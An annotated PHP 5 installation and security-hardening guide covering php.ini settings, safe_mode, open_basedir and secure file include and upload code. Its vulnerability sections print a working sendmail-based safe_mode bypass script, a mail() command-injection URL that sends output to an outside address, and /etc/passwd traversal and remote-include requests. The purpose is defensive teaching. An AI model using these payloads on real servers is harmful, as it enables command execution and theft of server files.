Installation
1. First download PHP 5.2.5 (http://www.php.net/downloads.php). The PHP installation path used in this article is c:\php.
2. Unpack the Windows zip archive directly into C:\php\, so that C:\php is the PHP program directory. (The original text names php-5.1.2-win32.zip here, which does not match the 5.2.5 download in step 1; use the archive that matches the version you downloaded.)
3. The original instructions then copy all DLL files from C:\php\ into C:\Windows\system32 (c:\winnt\system32 on Windows 2000), overwriting any existing DLLs. This is not recommended: overwriting system DLLs can break other software and is hard to undo. Adding C:\php to the system PATH (or pointing the web server at C:\php directly) lets PHP find its DLLs without touching system32.
4. Open php.ini-dist in Notepad and make the following changes, using Notepad's Find function to locate each line:
Search for
CODE:
register_globals = Off
The original text changes this to register_globals = On because many older PHP programs rely on request variables being registered as globals. Do not do this unless a program you must run requires it: with register_globals on, every request parameter becomes a PHP variable, and the "Variable abuse" section below shows how that is exploited. Keep the default register_globals = Off.
Search again for
CODE:
extension_dir =
and point it at the ext directory under your PHP directory: extension_dir = "C:/php/ext"
Create a folder named tmp under c:\php.
Find
CODE:
; upload_tmp_dir =
Remove the comment character (the leading semicolon ";") so that the line takes effect. upload_tmp_dir defines the temporary directory for uploaded files; you can also set it to any absolute path, but the directory must be readable and writable by the web server user. This article sets it to the folder created above:
upload_tmp_dir = C:/php/tmp
Search for
CODE:
; Windows Extensions
Below it are the extension lines. Remove the leading ";" from the ones you need; commonly used ones are:
CODE:
extension=php_mbstring.dll
extension=php_curl.dll
extension=php_dbase.dll
extension=php_gd2.dll
extension=php_ldap.dll
extension=php_zip.dll
extension=php_mysql.dll
php_gd2.dll provides the GD library and is needed by most applications. Only enable extensions you actually use; each one is extra code loaded into the web server process.
Find
CODE:
; session.save_path =
Remove the leading semicolon; this article sets it to
session.save_path = c:/php/tmp
Other commented-out options can be enabled the same way as needed. Then save the file as php.ini in C:\Windows (C:\WINNT under Windows 2000); note that the file extension must be changed to .ini, giving C:\Windows\php.ini (C:\WINNT\php.ini under Windows 2000).
Common Security Settings
I. Web server security
PHP runs as a module of the web server, so the first thing to secure is the web server itself; the web server in turn depends on the security of the operating system, and so on without end. PHP works with many web servers, but only Apache is discussed here. It is strongly recommended to run Apache in a chroot jail, so that even if Apache, PHP or a PHP script is compromised, only the jailed tree is affected and the real system is not. Chrooting Apache does bring some inconvenience: for example, connections to MySQL must use a TCP connection to 127.0.0.1 instead of the localhost Unix socket (slightly less efficient), and sending mail with the mail() function is also a problem,
because the php.ini settings
[mail function]
; For Win32.
SMTP = localhost
; For Win32.
sendmail_from = me@localhost.com
apply only to the Win32 platform; on Unix a working sendmail binary (or a sendmail-compatible one) must be available inside the chroot environment.
II. Problems in PHP itself
1. Remote overflow
All PHP versions below 4.1.2 have a remote buffer overflow in file upload handling; the attack program is widely circulated and has a high success rate.
2. Remote denial of service
PHP 4.2.0 and 4.2.1 have a remote vulnerability in multipart/form-data POST request processing; although it does not yield local user privileges, it can cause a denial of service.
3. safe_mode bypass vulnerability
In PHP 4.2.2 and below, the mail() function can be used to bypass the safe_mode restriction and execute commands. Starting with 4.0.5, mail() gained a fifth parameter (extra command-line arguments passed to sendmail), and because of a design error it can be used to break out of safe_mode and run commands. In 4.0.5 the bypass is trivial: just append a shell command separated by a semicolon. For example, given a script evil.php that passes the request variable $bar as the fifth argument of mail(), requesting the URL
http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com
sends the output of id to evil@domain.com.
For PHP 4.0.6 to 4.2.2 the safe_mode bypass relies on sendmail's -C option (load an alternative configuration file), so the system must be using sendmail. The following code breaks through the safe_mode restriction and executes a command:
<?php
// The two files below must not already exist, or must be owned by the same
// user as this script (otherwise safe_mode's uid check refuses to open them).
$script = "/tmp/script123";
$cf = "/tmp/cf123";
$cmd = "id";   // the shell command to run

// A minimal sendmail.cf: a queue directory, a rewriting rule that routes every
// address to the "local" mailer, and a "local" mailer that is really sh $script.
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

// The script sendmail ends up executing: remove the evidence, then run $cmd.
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf;");
fwrite($fd, $cmd);
fclose($fd);

// -C makes sendmail read our configuration file instead of the system one;
// the fifth argument of mail() passes it straight onto the sendmail command line.
mail("nobody", "", "", "", "-C$cf");
?>
Anyone running one of the affected versions above must upgrade to the latest version promptly to eliminate these basic problems. (Later PHP releases also disable the fifth parameter of mail() when safe_mode is on.)
III. PHP's own security configuration
PHP is very flexible: options can be set in php.ini, in httpd.conf, in .htaccess files (the directory must have AllowOverride All or Options), and from within a script with ini_set() and other option-specific functions. phpinfo() and get_cfg_var() can be used to read individual configuration values.
If a configuration option has only the PHP_INI_SYSTEM property, it can be modified only in php.ini or httpd.conf; this changes PHP's master value and takes effect only after the web server is restarted. A setting in php.ini applies to every script on the web server; a setting in httpd.conf applies to every script in the directory it is defined for.
Options with the PHP_INI_USER, PHP_INI_PERDIR or PHP_INI_ALL property can additionally be set in .htaccess files, or with ini_set() in the script itself; this changes the local value and takes effect immediately. However, .htaccess only affects scripts in its own directory, and ini_set() only affects the script that calls it, from the point of the call onward. The property of each option may vary between versions; the following command lists all options and their properties from the main.c file of the current source tree:
grep PHP_INI_ /PHP_SRC/main/main.c
Before discussing PHP security configuration, you should have a good understanding of PHP's safe_mode.
1. safe_mode
safe_mode is a PHP_INI_SYSTEM option, so it can only be set in php.ini or httpd.conf. To enable it, either set in php.ini:
safe_mode = On
or define it for a directory in httpd.conf (the directory path here is only an example):
<Directory /var/www>
Options FollowSymLinks
php_admin_value safe_mode 1
</Directory>
After restarting Apache, safe_mode is in effect. Enabling safe_mode restricts many PHP functions, especially those that open files on the system or execute commands.
All file-operation functions will only operate on files whose uid matches the script's uid. For example, suppose test.php reads ./index.html and the files in its directory are owned as follows:
$ ls -la
drwxr-xr-x  2 root     root          01:25 .
drwxr-xr-x    root     root      384 Jun 12:02 ..
-rw-r--r--  1 root     root     4110 Oct 2002 index.html
-rw-r--r--  1 www-data www-data      Jun 19:14 test.php
Requesting test.php in the browser then produces the following error:
Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1
If the uid of the directory containing the target file matches the script's uid, the file can be accessed even when the file's own uid differs; whether this is a PHP vulnerability or intended behaviour is left aside here. The owner of PHP scripts should therefore be a user dedicated to that purpose; never make root the owner of PHP scripts, or safe_mode has no effect at all.
If you want to relax this to a gid comparison, enable safe_mode_gid so that only the gid of the file is compared:
safe_mode_gid = On
With safe_mode on, all command-execution functions are limited to running programs in the directory given by safe_mode_exec_dir in php.ini, and shell_exec() and the backtick operator (`ls -l`) are disabled. If you really need to call another program, set in php.ini:
safe_mode_exec_dir = /usr/local/php/exec
then copy the program into that directory, and PHP scripts can run it with system() and similar functions. Be aware that a shell script placed in that directory can still call commands in any other directory, so the contents of safe_mode_exec_dir must be controlled as carefully as the scripts themselves.
safe_mode_include_dir string
uid/gid checks are bypassed when including files from this directory and its subdirectories (the directory must be in include_path or be given with a full path).
As of PHP 4.2.0 this directive takes a semicolon-separated list of paths, in the same style as include_path, rather than a single directory. The restriction is actually a prefix, not a directory name: safe_mode_include_dir = /dir/incl also allows access to /dir/include and /dir/incls if they exist. To restrict access to exactly one directory, end it with a slash,
for example: safe_mode_include_dir = /dir/incl/
safe_mode_allowed_env_vars string
Setting certain environment variables may be a potential security breach. This directive contains a comma-delimited list of prefixes; in safe mode, the user may only alter environment variables whose names begin with one of the prefixes supplied here. By default, users can only set environment variables that begin with PHP_ (such as PHP_FOO=BAR).
Note: if this directive is empty, PHP will let the user modify any environment variable!
safe_mode_protected_env_vars string
This directive contains a comma-delimited list of environment variables that the end user cannot change with putenv(). These variables stay protected even if safe_mode_allowed_env_vars is set to allow changing them.
Although safe_mode is not a panacea (older PHP versions can bypass it, as shown above), it is strongly recommended to enable it to a suitable degree to ward off unknown attacks. Enabling safe_mode imposes many restrictions and may affect applications, so code and configuration need to be adjusted to work together; the functions restricted or disabled by safe mode are listed in the PHP manual. Note also that safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4: on current PHP versions it no longer exists, and the remaining controls are open_basedir, disable_functions and running scripts under a dedicated unprivileged user.
Having covered safe_mode, the following discusses how to avoid vulnerabilities through server-side PHP configuration, together with the actual problems that arise in program code.
2. Variable abuse
With register_globals = On (the PHP default before 4.2.0), variables from GET, POST, cookies, the environment and the session are registered directly as global variables. The registration order is variables_order = "EGPCS" (changeable in php.ini); when two sources carry the same name, the one further to the right overrides the one to the left. Misuse of variables therefore easily causes confusion in a program, and script programmers often do not have the habit of initializing variables, so code like the following is extremely vulnerable:
test_1.php
<?php
if ($pass == "hello")
    $auth = 1;
if ($auth == 1)
    echo "some important information";
else
    echo "nothing";
?>
An attacker can bypass the check with nothing more than the request:
http://victim/test_1.php?auth=1
Although this is a very elementary mistake, some well-known programs have made it, for example the PHP-Nuke remote file copy vulnerability: http://www.securityfocus.com/bid/3361
When PHP 4.1.0 was released, turning register_globals off was recommended and seven special array variables (the superglobals such as $_GET, $_POST and $_COOKIE) were provided for reading request data: variables from GET, POST, cookies and so on are no longer registered directly as variables and must be accessed through these arrays. With PHP 4.2.0 the php.ini default became register_globals = Off. An uninitialized variable then has PHP's own default value (empty, which compares equal to 0), so an attacker can no longer control the variable used in the check.
Workaround:
In php.ini set
register_globals = Off
and require programmers to initialize every variable used in a decision at the start of the program.
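The following is an added example, not code from the original article: test_1.php rewritten so that it cannot be influenced by request variables even on a misconfigured server. The password "hello" and the variable names follow the article's snippet; the fail-closed check on register_globals and the use of $_POST are this example's own choices.

```php
<?php
// Added example: hardened form of the article's test_1.php.

// Refuse to run if the dangerous setting is on, so a misconfigured server
// fails closed instead of silently exposing the authorization check below.
function register_globals_is_on()
{
    // ini_get() returns "" or "0" for Off and "1" for On; normalize anyway in
    // case the value was set through php_admin_value with a different spelling.
    $v = strtolower(trim((string) ini_get('register_globals')));
    return !($v === '' || $v === '0' || $v === 'off' || $v === 'no' || $v === 'false');
}

// The decision variable is local and initialized before any code path can
// read it, and the password comes from one explicitly chosen source ($_POST),
// so a query string such as ?auth=1 has nothing to overwrite.
function is_authorized(array $post)
{
    $auth = 0;                                        // always initialized
    $pass = isset($post['pass']) && is_string($post['pass']) ? $post['pass'] : '';
    if ($pass === 'hello') {                          // strict comparison
        $auth = 1;
    }
    return $auth === 1;
}

if (register_globals_is_on()) {
    header('HTTP/1.1 500 Internal Server Error');
    exit("register_globals is enabled; refusing to run.\n");
}

if (is_authorized($_POST)) {
    echo "some important information";
} else {
    echo "nothing";
}
?>
```

With register_globals off this is simply the correct way to write the check; with it on, the script stops with an error instead of letting http://victim/test_1.php?auth=1 succeed, which makes the misconfiguration visible the first time anyone loads the page.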
3. File open
An extremely vulnerable code fragment:
// test_2.php
<?php
if (!($str = readfile("$filename"))) {
    echo "Could not open file\n";
    exit;
} else {
    echo $str;
}
?>
Because an attacker can specify an arbitrary $filename, the following request reveals /etc/passwd:
http://victim/test_2.php?filename=/etc/passwd
and the following request reads the source of the PHP file itself:
http://victim/test_2.php?filename=test_2.php
PHP's other file-opening functions, such as fopen() and file(), have the same problem: if the file name variable is not checked strictly, important server files can be read.
Workaround:
Unless there is a special need, restrict PHP file operations to the web directory.
Here is an example of modifying the Apache configuration file httpd.conf:
php_admin_value open_basedir /usr/local/apache/htdocs
After restarting Apache, PHP scripts in /usr/local/apache/htdocs can only operate on files under that directory; otherwise PHP reports:
Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx
This problem can also be mitigated with safe_mode, as discussed above.
4. Include file
An extremely vulnerable code fragment:
// test_3.php
<?php
if (file_exists($filename))
    include("$filename");
?>
This irresponsible code can cause considerable harm. An attacker obtains /etc/passwd with the following request:
http://victim/test_3.php?filename=/etc/passwd
On the Unix version of PHP (the Windows version of that era did not support opening remote files), an attacker can place a file containing shell commands, such as http://attack/attack.txt, on a machine running an HTTP or FTP service, and then execute commands (for example ls /etc) on the target host with the request:
http://victim/test_3.php?filename=http://attack/attack.txt
Attackers can even obtain command execution by including the Apache log files access.log and error.log after planting PHP code in a request line, although the surrounding log noise sometimes makes this hard to pull off.
Another form, the following code fragment:
// test_4.php
<?php
include("$lib/config.php");
?>
An attacker can create a config.php containing command-execution code on their own host and then execute commands on the target host with the request:
http://victim/test_4.php?lib=http://attack
PHP's include functions are include(), include_once(), require() and require_once(). If the variable used as the included file name is not checked, the system is at serious risk: commands can be executed remotely.
Workaround:
Require programmers to avoid variables in include parameters as far as possible; if a variable must be used, the file name to include must be strictly checked and never left for the user to specify arbitrarily.
Restricting PHP's operating path with open_basedir, as in the file-open section above, is also necessary. And be sure to turn off PHP's remote file opening unless you specifically need it.
Modify php.ini:
allow_url_fopen = Off
and restart Apache. (Since PHP 5.2.0 remote includes are additionally governed by allow_url_include, which defaults to Off; keep it off even if allow_url_fopen must stay on for other reasons.)
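The following added example (not code from the original article) shows the code-level side of the two workarounds above: the article's test_2.php (file read) and test_3.php / test_4.php (include) rewritten so that user input never reaches a file path unchecked. The base directory, the page table and the query parameter names are assumptions made for the example.

```php
<?php
// Added example: hardened file read and include, serving the "File open"
// and "Include file" sections.

// Resolve a user-supplied relative name and accept it only if it stays inside
// $base. realpath() collapses "../" and symlinks before the prefix check, so
// traversal cannot slip past it, and it returns false for URLs (http://, ftp://)
// because they have no filesystem path at all.
function resolve_under_base($base, $name)
{
    if (!is_string($name) || strpos($name, "\0") !== false) {
        return false;                      // NUL bytes truncate paths in old PHP
    }
    $baseReal = realpath($base);
    $real     = realpath($base . '/' . $name);
    if ($baseReal === false || $real === false) {
        return false;                      // base missing or target missing
    }
    $baseReal = rtrim($baseReal, '/') . '/';
    if (strncmp($real, $baseReal, strlen($baseReal)) !== 0) {
        return false;                      // escaped the base directory
    }
    return $real;
}

// test_2.php hardened: only files under one public subtree are readable.
function show_file($name)
{
    $real = resolve_under_base('/usr/local/apache/htdocs/public', $name); // assumed
    if ($real === false || !is_file($real)) {
        header('HTTP/1.1 404 Not Found');
        return false;
    }
    readfile($real);
    return true;
}

// test_3.php / test_4.php hardened: the request carries a page *key*, not a
// path, and the key is looked up in a fixed table. Nothing the client sends is
// ever used as a path component of include(), so neither traversal nor a
// remote URL can reach it, whatever allow_url_fopen is set to.
function include_page($key)
{
    $pages = array(                                   // assumed page table
        'home'    => '/usr/local/apache/htdocs/lib/home.php',
        'contact' => '/usr/local/apache/htdocs/lib/contact.php',
    );
    if (!is_string($key) || !isset($pages[$key])) {
        header('HTTP/1.1 404 Not Found');
        return false;
    }
    include $pages[$key];
    return true;
}

// Dispatch from explicit superglobals, never from register_globals.
$filename = isset($_GET['filename']) ? $_GET['filename'] : '';
$page     = isset($_GET['page'])     ? $_GET['page']     : 'home';

if ($filename !== '') {
    show_file($filename);   // ../../etc/passwd and http://attack/attack.txt -> 404
} else {
    include_page($page);    // only 'home' or 'contact' ever reach include()
}
?>
```

open_basedir and allow_url_fopen = Off remain the server-side backstop; the point of the code is that the requests shown in the text (filename=/etc/passwd, filename=http://attack/attack.txt, lib=http://attack) are refused before any file function runs, so the application does not depend on the server being configured correctly.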
5. File upload
PHP's file upload mechanism saves an uploaded file under a random temporary name such as phpxxuoxg in the temporary directory defined by upload_tmp_dir in php.ini (by default the system temporary directory, for example /tmp); when the script finishes, the temporary file is deleted. For an upload form field named file, PHP defines four variables (shown here with register_globals on):
$file        # the temporary file saved on the server (such as /tmp/phpxxuoxg)
$file_size   # the size of the uploaded file
$file_name   # the original name of the uploaded file
$file_type   # the type of the uploaded file
The recommended way to access them is:
$HTTP_POST_FILES["file"]["tmp_name"]
$HTTP_POST_FILES["file"]["size"]
$HTTP_POST_FILES["file"]["name"]
$HTTP_POST_FILES["file"]["type"]
(or, from PHP 4.1.0, the equivalent $_FILES["file"][...]).
This is one of the simplest file upload scripts:
test_5.php
<?php
if (isset($upload) && $file != "none") {
    copy($file, "/usr/local/apache/htdocs/upload/" . $file_name);
    echo "File " . $file_name . " uploaded successfully! Click to continue uploading";
    exit;
}
?>
Such upload code has serious problems, both reading arbitrary files and executing commands. With register_globals on, nothing proves that $file is really an uploaded temporary file: an attacker who submits file=/etc/passwd and file_name=passwd.txt as ordinary form fields, with no upload at all, makes copy() place /etc/passwd in the web directory where it can then be fetched. And because $file_name is used unchecked, uploading a file named shell.php puts an executable PHP script under the document root.
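The following added example (not code from the original article) is test_5.php rewritten to close both problems just described. The destination directory, the size limit and the list of allowed extensions are assumptions made for the example.

```php
<?php
// Added example: hardened form of the article's test_5.php.

// Validate one entry of $_FILES and return the path it was stored at, or
// false. Each check addresses a specific abuse of the original script.
function handle_upload(array $f, $destDir, $maxBytes = 2097152)
{
    // 1. PHP's own upload status: anything but UPLOAD_ERR_OK is a failure.
    if (!isset($f['error']) || $f['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    // 2. The temp file must really come from this request's upload, so a
    //    forged tmp_name such as /etc/passwd is refused. This is the check
    //    that copy() in the original never made.
    if (!isset($f['tmp_name']) || !is_uploaded_file($f['tmp_name'])) {
        return false;
    }
    // 3. Enforce a size limit in code; upload_max_filesize is only a backstop.
    if ($f['size'] > $maxBytes || filesize($f['tmp_name']) > $maxBytes) {
        return false;
    }
    // 4. Never trust the client's name or MIME type. Keep only the extension,
    //    and only if it is on a whitelist of non-executable types.
    $allowed = array('jpg', 'png', 'gif', 'txt', 'pdf');      // assumed list
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;                                          // shell.php, x.phtml ...
    }
    // 5. Generate the stored name ourselves: random, with exactly one extension,
    //    so "a.php.jpg" becomes "<random>.jpg" and Apache's multi-extension
    //    handling never sees ".php". random_bytes() exists from PHP 7; the
    //    fallback is only for uniqueness, not secrecy.
    $name = (function_exists('random_bytes') ? bin2hex(random_bytes(8))
                                             : sha1(uniqid(mt_rand(), true)))
            . '.' . $ext;
    $dest = rtrim($destDir, '/') . '/' . $name;
    // 6. move_uploaded_file() also refuses non-upload sources and moves the
    //    temp file into place in one step.
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        return false;
    }
    chmod($dest, 0644);                                        // readable, never executable
    return $dest;
}

// Store uploads *outside* the document root (assumed path) and serve them back
// only through a download script; then even a PHP file that slipped through
// could not be executed by the web server.
$destDir = '/usr/local/apache/uploads';

if (isset($_POST['upload']) && isset($_FILES['file'])) {
    $stored = handle_upload($_FILES['file'], $destDir);
    if ($stored === false) {
        header('HTTP/1.1 400 Bad Request');
        echo "Upload rejected.";
    } else {
        echo "File stored as " . htmlspecialchars(basename($stored)) . ".";
    }
}
?>
```

The two checks that matter most are is_uploaded_file() (which defeats the file=/etc/passwd trick regardless of register_globals) and discarding the client-supplied file name in favour of a server-generated one (which defeats shell.php); the whitelist and the out-of-webroot directory are defence in depth on top of those.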
Common performance settings
First, edit the /etc/php5/apache2/php.ini file for the general configuration. Make a backup of the file before changing it so you can recover from a mistake.
memory_limit = 8M            => change to the memory size you need
upload_max_filesize = 2M     => change to the maximum upload size you need
extension=mysql.so           => support for MySQL
extension=gd.so              => support for the GD functions
In fact, on Ubuntu, installing the php5-mysql and php5-gd packages adds the last two lines automatically; all you need to do is confirm that they are not commented out.
Additions:
1. At present most open-source PHP software is written for PHP 4; for compatibility with older code it is sometimes necessary to enable register_long_arrays, otherwise variables such as $HTTP_GET_VARS and $HTTP_POST_VARS do not work and cause puzzling problems.
2. After installing php5, also confirm that the link /etc/apache2/mods-enabled/php5.load -> /etc/apache2/mods-available/php5.load exists.
Second, hardening PHP to enhance security
Note that the settings below depend on your situation, so the function of each one is described; if something stops working, check whether one of the following restrictions is responsible and comment it out accordingly.
Now we harden PHP by editing /etc/php5/apache2/php.ini again; the changes are made in a second pass rather than all at once so that the purpose of each one is clear.
1. Enable safe mode. Its advantage is that a PHP script can only access files owned by the same user as the script itself, so even inside a chroot environment it cannot read files of other owners in the jail, and a PHP backdoor such as phpshell becomes useless. phpshell is a popular PHP backdoor that executes system commands; as its name suggests, it behaves much like a shell.
safe_mode = On
2. The following setting limits the directory range that fopen(), file() and similar functions may operate on, preventing an intruder from reading files illegally. The trailing "/" after /var/www is required: open_basedir is a prefix match, so without it files under /var/wwww would also be accessible. This option also prevents PHP files outside /var/www/ from running, including programs reached through a symbolic link from /var/www/, such as the phpMyAdmin package, which does not work correctly with this option set.
open_basedir = /var/www/
3. Disable the phpinfo and get_cfg_var functions to avoid leaking server information; generally do this after confirming that PHP works normally.
disable_functions = phpinfo,get_cfg_var
4. Set up the PHP error log:
error_reporting = E_ALL
log_errors = On
error_log = /var/log/php_err.log
(With errors going to a file, also make sure display_errors is Off on a production server so that error text is not shown to visitors.)
5. If a PHP program does not state that it needs register_globals, set register_globals to Off, which avoids many security problems. Note that if your program does need register_globals, turning it off will break it; fixing the program is preferable to leaving the option on. Ubuntu's default is Off.
register_globals = Off
6. Do not allow remote URL opening. Remember the PHP include vulnerabilities? When a PHP program includes a file named by a variable, an intruder can make the server fetch and execute a remote PHP program locally, such as phpshell, so we turn this off.
allow_url_fopen = Off
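The following added example (not code from the original article) is a configuration audit for the settings discussed in this section and in "PHP's own security configuration" above. It reads the values through ini_get(), so it reports the effective configuration (php.ini, httpd.conf php_admin_value and .htaccess combined) rather than what one file says. The list of expected values is this example's own choice; expose_php and the exec-family functions in disable_functions go beyond what the article lists and are marked as such.

```php
<?php
// Added example: audit the effective PHP configuration against the hardening
// settings above. Run once with "php audit.php" (or from the web root, then
// delete it) and act on every line marked FAIL.

// ini_get() returns "" or "0" for Off and "1" for On, but values such as
// "stderr" (display_errors) are also "on" in effect, so treat only the known
// off spellings as off.
function ini_bool($name)
{
    $v = strtolower(trim((string) ini_get($name)));
    return !($v === '' || $v === '0' || $v === 'off' || $v === 'no' || $v === 'false');
}

// Returns a list of findings: array(setting, expected, actual, ok).
function audit_php_ini()
{
    $findings = array();

    // Boolean directives and the value a hardened server should have.
    $booleans = array(
        'register_globals'  => false,   // request vars must not become globals
        'allow_url_fopen'   => false,   // no remote file opening or including
        'allow_url_include' => false,   // PHP >= 5.2.0; absent counts as Off
        'display_errors'    => false,   // no error text shown to visitors
        'log_errors'        => true,    // but do keep a log
        'expose_php'        => false,   // example's addition: no X-Powered-By header
    );
    foreach ($booleans as $name => $want) {
        $have = ini_bool($name);
        $findings[] = array($name, $want ? 'On' : 'Off', $have ? 'On' : 'Off', $have === $want);
    }

    // open_basedir must be set and end with "/" (it is a prefix match).
    $ob = (string) ini_get('open_basedir');
    $ok = $ob !== '' && substr($ob, -1) === '/';
    $findings[] = array('open_basedir', 'non-empty, trailing /', $ob === '' ? '(unset)' : $ob, $ok);

    // disable_functions: phpinfo/get_cfg_var are the article's minimum; the
    // command-execution functions are this example's stricter addition.
    $want = array('phpinfo', 'get_cfg_var', 'system', 'exec', 'passthru',
                  'shell_exec', 'proc_open', 'popen');
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $missing  = array_diff($want, $disabled);
    $findings[] = array('disable_functions', implode(',', $want),
                        implode(',', $disabled), count($missing) === 0);

    // safe_mode only exists before PHP 5.4; on later versions skip it.
    if (version_compare(PHP_VERSION, '5.4.0', '<')) {
        $sm = ini_bool('safe_mode');
        $findings[] = array('safe_mode', 'On', $sm ? 'On' : 'Off', $sm);
    }
    return $findings;
}

// Print one line per finding and return the number of failures.
function print_findings(array $findings)
{
    $bad = 0;
    foreach ($findings as $f) {
        list($name, $want, $have, $ok) = $f;
        printf("%-18s %-5s expected: %-30s actual: %s\n",
               $name, $ok ? 'ok' : 'FAIL', $want, $have);
        if (!$ok) {
            $bad++;
        }
    }
    return $bad;
}

$bad = print_findings(audit_php_ini());
exit($bad === 0 ? 0 : 1);   // non-zero exit lets a deployment script stop on failure
?>
```

Because the script exits non-zero on any failure, it can be run from a deployment or cron job so that a php.ini that drifts back to register_globals = On or allow_url_fopen = On is noticed, rather than discovered through an incident.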
Install Zend Optimizer
After downloading ZendOptimizer-3.3.0a-Windows-i386.exe, double-click it to install. During installation select the web server (choose Apache 2.x); when prompted to restart the web server, choose yes; before completion it asks whether to back up php.ini, click OK, and then finish the installation. Here it is installed to c:\php5\Zend, as shown in Figure 4.1.
Figure 4.1 Installation path
Figure 4.2 Server type
Figure 4.3 php.ini directory
Figure 4.4 Apache directory
Figure 4.5 Installation complete
The Zend Optimizer installation wizard modifies php.ini automatically according to your choices so that the engine starts. The configuration options for Zend Optimizer are briefly introduced below. This is the default configuration added to php.ini after installation:
; path of the Zend extension manager module on disk
zend_extension_ts="C:\php5\Zend\lib\ZendExtensionManager.dll"
; directory where the optimizer resides; no change needed by default
zend_extension_manager.optimizer_ts="C:\php5\Zend\lib\Optimizer-3.3.0a"
; optimization level: a bit mask over the 10 optimization passes. The default
; value 15 (binary 1111) enables passes 1-4; 1023 (ten 1 bits) enables all 10.
zend_optimizer.optimization_level=1023
When phpinfo() is called it displays:
Zend Engine v1.3.0, Copyright (c) 1998-2004 Zend Technologies with Zend Extension Manager v1.0.9, Copyright (c) 2003-2006, by Zend Technologies and Zend Optimizer v3.3.0a, Copyright (c) 1998-2006, by Zend Technologies
which indicates that the installation succeeded.
Taken from "http://wiki.lupaworld.com/index.php/PHP_5.x"